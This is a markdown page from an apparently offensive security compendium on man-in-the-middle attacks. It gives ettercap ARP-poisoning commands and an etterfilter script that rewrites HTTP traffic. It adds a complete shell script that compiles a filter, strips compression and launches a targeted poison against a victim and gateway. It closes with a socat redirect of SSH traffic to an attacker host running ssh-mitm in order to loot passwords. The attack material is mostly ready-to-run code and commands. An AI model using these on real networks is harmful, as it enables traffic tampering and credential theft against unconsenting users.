killchain-compendium/Post Exploitation/Man in the Middle.md


Man In the Middle

Ettercap

  • Ettercap

  • Bettercap

  • ARP spoofing via ettercap with the traffic shown in text mode. Press q to quit; on exit ettercap re-ARPs the hosts so their caches return to the pre-MITM state. Without target specs the whole subnet is poisoned.

ettercap -T -i <interface> -M arp
  • Etterfilter compiles filter scripts that match, log and rewrite packets while they are being forwarded (see man etterfilter). Example that rewrites a requested filename in HTTP traffic:
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html" );
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
  • Escape double quotes inside a payload string as \" (etterfilter strings are themselves double-quoted)
  • Compile the source into a binary filter (keep the names distinct, otherwise the source is overwritten):
etterfilter filter.filter -o filter.ef
  • Run the filter via
ettercap -T -i <interface> -M arp -F filter.ef
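The procedure above (write a filter, compile it, run a targeted poison) as one script. This is an added example, not code from the compendium or from ettercap; it assumes Linux with ettercap/etterfilter installed, root privileges, and placeholder interface and IP values. It adds two things the note only hints at: the quote escaping for filter strings, and a rule that strips Accept-Encoding from requests, since search()/replace() cannot match inside a compressed response body.

```shell
#!/bin/sh
# Added example (not ettercap's own code): build an etterfilter source,
# compile it and launch a targeted ARP MITM that rewrites HTTP responses.
# Assumes Linux, ettercap/etterfilter installed, root; addresses are placeholders.
set -eu

# etterfilter strings are double-quoted, so a literal " in a pattern must be
# written as \". Emit the escaped form of $1.
esc_filter_string() {
    printf '%s' "$1" | sed 's/"/\\"/g'
}

# Write an etterfilter source to $1 that rewrites $2 -> $3 in HTTP responses.
# The first rule mangles Accept-Encoding in client requests so the server
# answers uncompressed; a gzip body would never match the second rule.
write_filter() {
    out=$1
    needle=$(esc_filter_string "$2")
    repl=$(esc_filter_string "$3")
    {
        printf '%s\n' \
            '# request direction: refuse compressed responses (same length replacement)' \
            'if (ip.proto == TCP && tcp.dst == 80) {' \
            '    if (search(DATA.data, "Accept-Encoding")) {' \
            '        replace("Accept-Encoding", "Accept-Rubbish!");' \
            '    }' \
            '}' \
            '# response direction: keep a copy of the hit, then rewrite it'
        printf 'if (ip.proto == TCP && tcp.src == 80 && search(DATA.data, "%s")) {\n' "$needle"
        printf '    log(DATA.data, "/tmp/ettercap.log");\n'
        printf '    replace("%s", "%s");\n' "$needle" "$repl"
        printf '    msg("###### ETTERFILTER: substituted %s with %s ######\\n");\n' "$needle" "$repl"
        printf '}\n'
    } > "$out"
}

# Source in, compiled filter out; distinct names so the source survives.
compile_filter() {
    etterfilter "$1" -o "$2"
}

# Command line for a poison limited to one victim and the gateway.
# Targets are MAC/IPs/PORTs; ettercap builds with IPv6 support expect a
# fourth field (MAC/IPs/IPv6/PORTs), i.e. /10.0.0.5/// instead of /10.0.0.5//.
# -q keeps packet contents off the terminal; q still stops and re-ARPs.
mitm_cmd() {
    iface=$1; victim=$2; gateway=$3; ef=$4
    printf 'ettercap -T -q -i %s -M arp:remote /%s// /%s// -F %s\n' \
        "$iface" "$victim" "$gateway" "$ef"
}

# Usage (as root):
#   MITM_RUN=1 sh mitm.sh eth0 10.0.0.5 10.0.0.1 filename.html otherfilename.html
# Without MITM_RUN the file only defines the functions above.
if [ -n "${MITM_RUN:-}" ]; then
    write_filter /tmp/rewrite.filter "$4" "$5"
    compile_filter /tmp/rewrite.filter /tmp/rewrite.ef
    sh -c "$(mitm_cmd "$1" "$2" "$3" /tmp/rewrite.ef)"
fi
```

The generated filter can be inspected with cat /tmp/rewrite.filter before compiling; the log written by log() is raw packet payload and is read back with etterlog.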

mitm-server

Set up a local man-in-the-middle SSH server, for example to loot passwords when somebody logs in through it. SSH-MITM provides this; install it with pip install ssh-mitm.

On the host whose SSH traffic is to be intercepted, redirect the port to the attacker host running ssh-mitm (10.10.14.4 here, listening on its default port 10022), then start the server there. The fork option is needed so that socat keeps accepting connections instead of exiting after the first one.

((socat TCP4-LISTEN:2222,fork,reuseaddr TCP4:10.10.14.4:10022 &) &)

ssh-mitm server --remote-host $TARGET_IP